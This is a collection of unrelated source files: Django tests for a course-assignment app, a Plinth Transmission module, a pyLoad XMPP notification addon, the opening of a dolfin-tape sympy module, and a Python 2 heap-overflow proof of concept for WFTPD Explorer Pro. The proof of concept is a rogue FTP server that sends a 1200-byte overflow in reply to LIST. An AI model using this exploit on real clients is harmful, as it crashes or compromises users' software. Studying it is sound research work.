def test_url_resolves_to_assignments_page_view(self):
found = resolve('/teacher/course/1/assignments')
self.assertEqual(found.func, assignment.assignments_page)
def test_assignments_page_with_no_submissions(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignments')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
self.assertIn(b'ajax_assignment_modal',response.content)
def test_url_resolves_to_assignment_table_view(self):
found = resolve('/teacher/course/1/assignments_table')
self.assertEqual(found.func, assignment.assignments_table)
def test_assignments_table_returns_with_no_submissions(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignments_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'ajax_assignment(0);',response.content)
def test_url_resolves_to_delete_assignment(self):
found = resolve('/teacher/course/1/delete_assignment')
self.assertEqual(found.func, assignment.delete_assignment)
def test_delete_assignment_with_no_submissions(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_assignment',{
'assignment_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'record not found')
def test_delete_assignment_with_submissions_and_correct_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_assignment',{
'assignment_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['status'], 'success')
self.assertEqual(array['message'], 'assignment was deleted')
def test_delete_assignment_with_submissions_and_incorrect_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_trudy_client()
response = client.post('/teacher/course/1/delete_assignment',{
'assignment_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'unauthorized deletion')
def test_url_resolves_to_save_assignment(self):
found = resolve('/teacher/course/1/save_assignment')
self.assertEqual(found.func, assignment.save_assignment)
def test_save_assignment_with_insert(self):
try:
Assignment.objects.get(assignment_id=1).delete()
except Assignment.DoesNotExist:
pass
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/save_assignment',{
'assignment_id': 0,
'assignment_num': 1,
'title': 'Test',
'description': 'Test',
'start_date': '2020-01-01',
'due_date': '2020-01-01',
'worth': 25,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'saved')
self.assertEqual(array['status'], 'success')
def test_save_assignment_with_update(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/save_assignment',{
'assignment_id': 1,
'assignment_num': 1,
'title': 'Test',
'description': 'Test',
'start_date': '2020-01-01',
'due_date': '2020-01-01',
'worth': 25,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'saved')
self.assertEqual(array['status'], 'success')
def test_url_resolves_to_assignment_page_view(self):
found = resolve('/teacher/course/1/assignment/1')
self.assertEqual(found.func, assignment.assignment_page)
def test_assignment_page(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1')
self.assertEqual(response.status_code, 200)
self.assertIn(b'ajax_question_modal',response.content)
def test_save_question_with_insert_essay_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.ESSAY_QUESTION_TYPE,
'question_num': 1,
'title': 'H+',
'description': 'What does it mean to be a human being?',
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_essay_question(self):
# Insert
EssayQuestion.objects.create(
question_id=1,
assignment=Assignment.objects.get(assignment_id=1),
title="Evolvers",
description="Write an essay about the Evolvers.",
)
# Update
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 1,
'question_type': settings.ESSAY_QUESTION_TYPE,
'question_num': 1,
'title': 'H+',
'description': 'What does it mean to be a human being?',
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_insert_multiple_choice_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.MULTIPLECHOICE_QUESTION_TYPE,
'question_num': 1,
'title': 'Sun',
'description': 'Why did humanity leave Earth?',
'a': 'Global Cooling',
'b': 'Abnormal Solar Hibernation',
'c': 'Global Warming',
'd': 'World Peace',
'a_is_correct': True,
'b_is_correct': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_multiple_choice_question(self):
# Insert
MultipleChoiceQuestion.objects.create(
question_id=2,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Who where the Hideauze?",
a="Former Humans",
a_is_correct=True,
b="Aliens",
b_is_correct=False,
c="Magical or Supernatural Creatures",
c_is_correct=False,
d="Transhumanists",
d_is_correct=True,
e="Heavenly Creatures",
e_is_correct=True,
)
# Update
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 2,
'question_type': settings.MULTIPLECHOICE_QUESTION_TYPE,
'question_num': 1,
'title': 'Sun',
'description': 'Why did humanity leave Earth?',
'a': 'Global Cooling',
'b': 'Abnormal Solar Hibernation',
'c': 'Global Warming',
'd': 'World Peace',
'a_is_correct': True,
'b_is_correct': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_insert_true_false_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.TRUEFALSE_QUESTION_TYPE,
'question_num': 3,
'title': 'Hideauze',
'description': 'Were the Hideauze once humans?',
'true_choice':'Yes, former humans',
'false_choice':'No, aliens',
'answer': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_true_false_question(self):
# Insert
TrueFalseQuestion.objects.create(
question_id=3,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Where the Hideauze human?",
true_choice="Yes, former humans",
false_choice="No, aliens",
answer=True,
)
# Update
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 3,
'question_type': settings.TRUEFALSE_QUESTION_TYPE,
'question_num': 3,
'title': 'Hideauze',
'description': 'Were the Hideauze once humans?',
'true_choice':'Yes, former humans',
'false_choice':'No, aliens',
'answer': True,
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_insert_response_question(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 0,
'question_type': settings.RESPONSE_QUESTION_TYPE,
'question_num': 4,
'title': 'Ice Age',
'description': 'Why did humanity migrate off-world?',
'answer': 'Because of solar hibernation causing Global Cooling on Earth.',
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_save_question_with_update_response_question(self):
# Insert
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
# Update
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/save_question',{
'question_id': 4,
'question_type': settings.RESPONSE_QUESTION_TYPE,
'question_num': 4,
'title': 'Mecha',
'description': "What was the name of Ledo's mech?",
'answer': 'Chambers',
'marks': 1,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was saved')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_essay_question(self):
EssayQuestion.objects.create(
question_id=1,
assignment=Assignment.objects.get(assignment_id=1),
title="Evolvers",
description="Write an essay about the Evolvers.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 1,
'question_type': settings.ESSAY_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_multiple_choice_question(self):
MultipleChoiceQuestion.objects.create(
question_id=2,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Who where the Hideauze?",
a="Former Humans",
a_is_correct=True,
b="Aliens",
b_is_correct=False,
c="Magical or Supernatural Creatures",
c_is_correct=False,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 2,
'question_type': settings.MULTIPLECHOICE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_true_false_question(self):
TrueFalseQuestion.objects.create(
question_id=3,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Where the Hideauze human?",
true_choice="Yes, former humans",
false_choice="No, aliens",
answer=True,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 3,
'question_type': settings.TRUEFALSE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_delete_question_with_response_question(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 4,
'question_type': settings.RESPONSE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'question was deleted')
self.assertEqual(array['status'], 'success')
def test_url_resolves_to_questions_table_view(self):
found = resolve('/teacher/course/1/assignment/1/questions_table')
self.assertEqual(found.func, assignment.questions_table)
def test_questions_table_returns_without_questions(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/questions_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'ajax_question(0,0);',response.content)
def test_questions_table_returns_with_questions(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/questions_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Response',response.content)
def test_question_type_modal(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_type_modal',**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_essay_modal(self):
EssayQuestion.objects.create(
question_id=1,
assignment=Assignment.objects.get(assignment_id=1),
title="Evolvers",
description="Write an essay about the Evolvers.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_essay_modal',{
'question_id': 1,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_multiple_choice_modal(self):
MultipleChoiceQuestion.objects.create(
question_id=2,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Who where the Hideauze?",
a="Former Humans",
a_is_correct=True,
b="Aliens",
b_is_correct=False,
c="Magical or Supernatural Creatures",
c_is_correct=False,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_multiple_choice_modal',{
'question_id':2,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_true_false_modal(self):
TrueFalseQuestion.objects.create(
question_id=3,
assignment=Assignment.objects.get(assignment_id=1),
title="Hideauze",
description="Where the Hideauze human?",
true_choice="Yes, former humans",
false_choice="No, aliens",
answer=True,
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_true_false_modal',{
'question_id':3,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_question_response_modal(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/assignment/1/question_response_modal',{
'question_id':4,
},**kwargs)
self.assertEqual(response.status_code, 200)
self.assertIn(b'question_modal',response.content)
def test_delete_question_with_incorrect_user(self):
ResponseQuestion.objects.create(
question_id=4,
assignment=Assignment.objects.get(assignment_id=1),
title="Ice Age",
description="Why did humanity migrate off-world?",
answer="Because of solar hibernation causing Global Cooling on Earth.",
)
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_trudy_client()
response = client.post('/teacher/course/1/assignment/1/delete_question',{
'question_id': 4,
'question_type': settings.RESPONSE_QUESTION_TYPE,
}, **kwargs)
self.assertEqual(response.status_code, 200)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['message'], 'unauthorized deletion')
self.assertEqual(array['status'], 'failed')
|
AcademicsToday/py-academicstoday
|
academicstoday_project/teacher/tests/test_assignment.py
|
Python
|
apache-2.0
| 26,573
|
#
# This file is part of Plinth.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Plinth module to configure Transmission server
"""
from django.utils.translation import ugettext_lazy as _
import json
from plinth import actions
from plinth import action_utils
from plinth import frontpage
from plinth import service as service_module
from plinth.menu import main_menu
version = 1
managed_services = ['transmission-daemon']
managed_packages = ['transmission-daemon']
name = _('Transmission')
short_description = _('BitTorrent')
description = [
_('BitTorrent is a peer-to-peer file sharing protocol. '
'Transmission daemon handles BitTorrent file sharing. Note that '
'BitTorrent is not anonymous.'),
_('Access the web interface at <a href="/transmission">/transmission</a>.')
]
reserved_usernames = ['debian-transmission']
service = None
def init():
"""Intialize the Transmission module."""
menu = main_menu.get('apps')
menu.add_urlname(name, 'glyphicon-save', 'transmission:index', short_description)
global service
setup_helper = globals()['setup_helper']
if setup_helper.get_state() != 'needs-setup':
service = service_module.Service(
managed_services[0], name, ports=['http', 'https'],
is_external=True, is_enabled=is_enabled,
enable=enable, disable=disable)
if is_enabled():
add_shortcut()
def setup(helper, old_version=None):
"""Install and configure the module."""
helper.install(managed_packages)
new_configuration = {'rpc-whitelist-enabled': False}
helper.call('post', actions.superuser_run, 'transmission',
['merge-configuration'],
input=json.dumps(new_configuration).encode())
helper.call('post', actions.superuser_run, 'transmission', ['enable'])
global service
if service is None:
service = service_module.Service(
managed_services[0], name, ports=['http', 'https'],
is_external=True, is_enabled=is_enabled,
enable=enable, disable=disable)
helper.call('post', service.notify_enabled, None, True)
helper.call('post', add_shortcut)
def add_shortcut():
frontpage.add_shortcut(
'transmission', name, short_description=short_description, url='/transmission',
login_required=True)
def is_enabled():
"""Return whether the module is enabled."""
return (action_utils.service_is_enabled('transmission-daemon') and
action_utils.webserver_is_enabled('transmission-plinth'))
def enable():
"""Enable the module."""
actions.superuser_run('transmission', ['enable'])
add_shortcut()
def disable():
"""Enable the module."""
actions.superuser_run('transmission', ['disable'])
frontpage.remove_shortcut('transmission')
def diagnose():
"""Run diagnostics and return the results."""
results = []
results.append(action_utils.diagnose_port_listening(9091, 'tcp4'))
results.append(action_utils.diagnose_port_listening(9091, 'tcp6'))
results.extend(action_utils.diagnose_url_on_all(
'https://{host}/transmission', check_certificate=False))
return results
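# Hedged usage sketch (illustrative, not part of the module): in a
# configured Plinth environment the hooks above could be exercised as
# doctest-style calls; the printed values are assumptions.
# >>> init()
# >>> is_enabled()
# True
# >>> for result in diagnose():
# ...     print(result)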
|
harry-7/Plinth
|
plinth/modules/transmission/__init__.py
|
Python
|
agpl-3.0
| 3,811
|
# -*- coding: utf-8 -*-
import asyncio
import os
import ssl
import slixmpp
from slixmpp.xmlstream.handler import Callback
from slixmpp.xmlstream.matcher import MatchXPath
from ..base.chat_bot import ChatBot
class XMPP(ChatBot):
__name__ = "XMPP"
__type__ = "addon"
__version__ = "0.23"
__status__ = "testing"
__config__ = [
("enabled", "bool", "Activated", False),
("jid", "str", "Jabber ID", "user@exmaple-jabber-server.org"),
("pw", "str", "Password", ""),
("use_ipv6", "bool", "Use ipv6", False),
("tls", "bool", "Use TLS", True),
("use_ssl", "bool", "Use old SSL", False),
(
"owners",
"str",
"List of JIDs accepting commands from",
"me@icq-gateway.org;some@msn-gateway.org",
),
("captcha", "bool", "Send captcha requests", True),
("info_file", "bool", "Inform about every file finished", False),
("info_pack", "bool", "Inform about every package finished", True),
("all_download", "bool", "Inform about all download finished", False),
("package_failed", "bool", "Notify package failed", False),
("download_failed", "bool", "Notify download failed", True),
("download_start", "bool", "Notify download start", True),
("maxline", "int", "Maximum line per message", 6),
]
__description__ = """Connect to jabber and let owner perform different tasks"""
__license__ = "GPLv3"
__authors__ = [
("RaNaN", "RaNaN@pyload.net"),
("GammaC0de", "nitzo2001[AT]yahoo[DOT]com"),
]
def activate(self):
self.log_debug("activate")
self.jid = slixmpp.jid.JID(self.config.get("jid"))
self.jid.resource = "PyLoadNotifyBot"
self.log_debug(self.jid)
super().activate()
def run(self):
self.log_debug("def run")
if os.name == "nt":
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
xmpp = XMPPClient(
self.jid,
self.config.get("pw"),
self.log_info,
self.log_debug,
)
self.log_debug("activate xmpp")
xmpp.use_ipv6 = self.config.get("use_ipv6")
xmpp.register_plugin("xep_0030") # Service Discovery
xmpp.register_plugin("xep_0004") # Data Forms
xmpp.register_plugin("xep_0060") # PubSub
xmpp.register_plugin("xep_0199") # XMPP Ping
xmpp.ssl_version = ssl.PROTOCOL_TLSv1_2
# The message event is triggered whenever a message
# stanza is received. Be aware that that includes
# MUC messages and error messages.
xmpp.add_event_handler("message", self.message)
xmpp.add_event_handler("connected", self.connected)
xmpp.add_event_handler("connection_failed", self.connection_failed)
xmpp.add_event_handler("disconnected", self.disconnected)
xmpp.add_event_handler("failed_auth", self.failed_auth)
xmpp.add_event_handler("changed_status", self.changed_status)
xmpp.add_event_handler("presence_error", self.presence_error)
xmpp.add_event_handler("presence_unavailable", self.presence_unavailable)
xmpp.register_handler(
Callback(
"Stream Error",
MatchXPath(f"{{{xmpp.stream_ns}}}error"),
self.stream_error,
)
)
self.xmpp = xmpp
self.xmpp.connect(
use_ssl=self.config.get("use_ssl"),
force_starttls=self.config.get("tls"),
)
self.xmpp.process(forever=True)
############################################################################
# xmpp handlers
def changed_status(self, stanza=None):
self.log_debug("changed_status", stanza, stanza.get_type())
def connection_failed(self, stanza=None):
self.log_error("Unable to connect", stanza)
def connected(self, event=None):
self.log_info("Client was connected", event)
def disconnected(self, event=None):
self.log_info("Client was disconnected", event)
def presence_error(self, stanza=None):
self.log_debug("presence_error", stanza)
def presence_unavailable(self, stanza=None):
self.log_debug("presence_unavailable", stanza)
def failed_auth(self, event=None):
self.log_info("Failed to authenticate")
def stream_error(self, err=None):
self.log_debug("Stream Error", err)
# self.periodical.stop()
def message(self, stanza):
"""
Message handler for the component.
"""
self.log_debug("message", stanza)
subject = stanza["subject"]
body = stanza["body"]
msg_type = stanza["type"]
sender_jid = stanza["from"]
names = self.config.get("owners").split(";")
self.log_debug(f"Message from {sender_jid} received.")
self.log_debug(f"Body: {body} Subject: {subject} Type: {msg_type}")
if msg_type == "headline":
#: 'headline' messages should never be replied to
return True
if subject:
subject = "Re: " + subject
if not (sender_jid.username in names or sender_jid.bare in names):
return True
temp = body.split()
try:
command = temp[0]
args = temp[1:]
except IndexError:
command = "error"
args = []
ret = False
try:
res = self.do_bot_command(command, args)
if res:
msg_reply = "\n".join(res)
else:
msg_reply = "ERROR: invalid command, enter: help"
self.log_debug("Send response")
ret = stanza.reply(msg_reply).send()
except Exception as exc:
self.log_error(exc)
stanza.reply("ERROR: " + str(exc)).send()
return ret
# end xmpp handler
############################################################################
def announce(self, message):
"""
Send message to all owners
"""
self.log_debug("Announce, message:", message)
for user in self.config.get("owners").split(";"):
self.log_debug("Send message to", user)
to_jid = slixmpp.jid.JID(user)
self.xmpp.sendMessage(
mfrom=self.jid, mto=to_jid, mtype="chat", mbody=str(message)
)
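# Example (illustrative): self.announce("All downloads finished.") sends
# one chat message to every JID listed in the 'owners' option.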
############################################################################
# pyLoad events
def exit(self):
self.xmpp.disconnect()
def before_reconnect(self, ip):
self.log_debug("before_reconnect")
self.xmpp.disconnect()
def after_reconnect(self, ip, oldip):
self.log_debug("after_reconnect")
self.xmpp.connect()
# self.periodical.start(600)
def download_failed(self, pyfile):
self.log_debug("download_failed", pyfile, pyfile.error)
try:
if self.config.get("download_failed"):
self.announce(
self._("Download failed: {} (#{}) in #{} @ {}: {}").format(
pyfile.name,
pyfile.id,
pyfile.packageid,
pyfile.pluginname,
pyfile.error,
)
)
except Exception as exc:
self.log_error(exc)
def package_failed(self, pypack):
self.log_debug("package_failed", pypack)
try:
if self.config.get("package_failed"):
self.announce(
self._("Package failed: {} ({}).").format(pypack.name, pypack.id)
)
except Exception as exc:
self.log_error(exc)
def package_finished(self, pypack):
self.log_debug("package_finished")
try:
if self.config.get("info_pack"):
self.announce(
self._("Package finished: {} ({}).").format(pypack.name, pypack.id)
)
except Exception as exc:
self.log_error(exc)
def download_finished(self, pyfile):
self.log_debug("download_finished")
try:
if self.config.get("info_file"):
self.announce(
self._("Download finished: {} (#{}) in #{} @ {}").format(
pyfile.name, pyfile.id, pyfile.packageid, pyfile.pluginname
)
)
except Exception as exc:
self.log_error(exc)
def all_downloads_processed(self, arg=None):
self.log_debug("all_downloads_processed", arg)
try:
if self.config.get("all_download"):
self.announce(self._("All download finished."))
except Exception:
pass
def download_start(self, pyfile, url, filename):
self.log_debug("download_start", pyfile, url, filename)
try:
if self.config.get("download_start"):
self.announce(
self._("Download start: {} (#{}) in (#{}) @ {}.").format(
pyfile.name, pyfile.id, pyfile.packageid, pyfile.pluginname
)
)
except Exception:
pass
# end pyLoad events
############################################################################
class XMPPClient(slixmpp.ClientXMPP):
def __init__(self, jid, password, log_info, log_debug):
self.log_debug = log_debug
self.log_info = log_info
slixmpp.ClientXMPP.__init__(self, jid, password)
self.add_event_handler("session_start", self.start)
def start(self, event):
self.log_debug("Session started")
self.send_presence()
self.get_roster(timeout=60)
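# Hedged usage sketch (illustrative only; the JID, password and server are
# placeholders, and a reachable XMPP server is assumed):
#
# client = XMPPClient(slixmpp.jid.JID("bot@example.org"), "secret",
#                     print, print)
# client.connect()
# client.process(forever=False)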
|
vuolter/pyload
|
src/pyload/plugins/addons/XMPP.py
|
Python
|
agpl-3.0
| 9,928
|
##########################################
# WftpdExpPro_HeapPoC.py #
# Discovered by r4x (Kamil Szczerba) #
# [r4xks@o2.pl] #
##########################################
# Soft : WFTPD Explorer Pro 1.0 #
# Vendor : Texas Imperial Software #
# Vuln : Heap Overflow (Res: LIST) #
# Exploit : PoC Reg Overwrite #
##########################################
# Reg: #
# EAX = 41414141 #
# ECX = 41414141 #
# EDX = 00a57b38 ASCII "AAAA..." #
# ESI = 00a57b30 ASCII "AAAA..." #
# ------------------------------ #
# EIP = 7c91142E #
# #
# Exception c0000005 (ACCESS_VIOLATION) #
# #
# MOV DWORD PTR DS:[ECX],EAX ; HEHE #
# MOV DWORD PTR DS:[EAX+4],ECX ; #
# #
# Tested on: WinXPsp2 Polish #
# #
##########################################
from socket import *
heapb0f = "A" * 1200 + "r\n"
req = (
"USER",
"PASS",
"TYPE",
"PWD",
"PASV",
"LIST"
)
res = (
"331 Password required.\r\n",
"230 User logged in.\r\n",
"200 Type set to I.\r\n",
"257 '/' is current directory.\r\n",
"227 Entering Passive Mode (127,0,0,1,100,100).\r\n",
"150 Opening ASCII mode data connection for file list.\r\n",
)
def parser(buff):
cmd = buff.split("\x20")[0]
cmd1 = buff.split("\r\n")[0]
if len(cmd) > len(cmd1):
cmd = cmd1
for i in range(len(req)):
if req[i] == cmd:
return res[i]
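# Example (illustrative): parser("USER anonymous\r\n") returns
# "331 Password required.\r\n"; commands not listed in req return None.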
def multiserv(port1, port2):
control = socket(AF_INET, SOCK_STREAM)
control.bind(('', port1))
control.listen(1)
trans = socket(AF_INET, SOCK_STREAM)
trans.bind(('', port2))
trans.listen(1)
while(1):
cclient, caddr = control.accept()
print "[*] Connected: ", caddr
cclient.send("220 Welcome: Evil Secure FTPD 1.666\r\n")
while(1):
r0 = cclient.recv(1024)
print "[>] Input: %s" % (r0)
r1 = parser(r0)
if r1 == None:
r1 = "502 Command not implemented.\r\n"
cclient.send(r1)
print "[<] Output: %s" % (r1)
if r1 == res[4]:
print "[*] Data mode\n"
tclient, taddr = trans.accept()
print "[*] Connected: ", taddr
if r1 == res[5]:
print "[*] b00mb!"
tclient.send(heapb0f)
print "[*] done"
break
break
multiserv(21, 25700)
|
knightmare2600/d4rkc0de
|
exploits/071218.py
|
Python
|
gpl-2.0
| 2,884
|
# Copyright (C) 2015 Jan Blechta
#
# This file is part of dolfin-tape.
#
# dolfin-tape is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# dolfin-tape is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with dolfin-tape. If not, see <http://www.gnu.org/licenses/>.
from sympy import Symbol, symbols, sin, pi, Matrix, diff, integrate, atan2, sqrt
from sympy import ccode as sympy_ccode
from dolfin import Expression, FiniteElement
__all__ = ["pLaplace_modes", "pLaplace_ChaillouSuri", "pStokes_vortices"]
ccode = lambda *args, **kwargs: sympy_ccode(*args, **kwargs).replace('M_PI', 'pi')
def pLaplace_modes(*args, **kwargs):
"""Returns 2-tuple of DOLFIN Expressions initialized with *args and
**kwargs passed in and solving zero BC p-Laplace problem on unit square
as solution and corresponding right-hand side.
Mandatory kwargs:
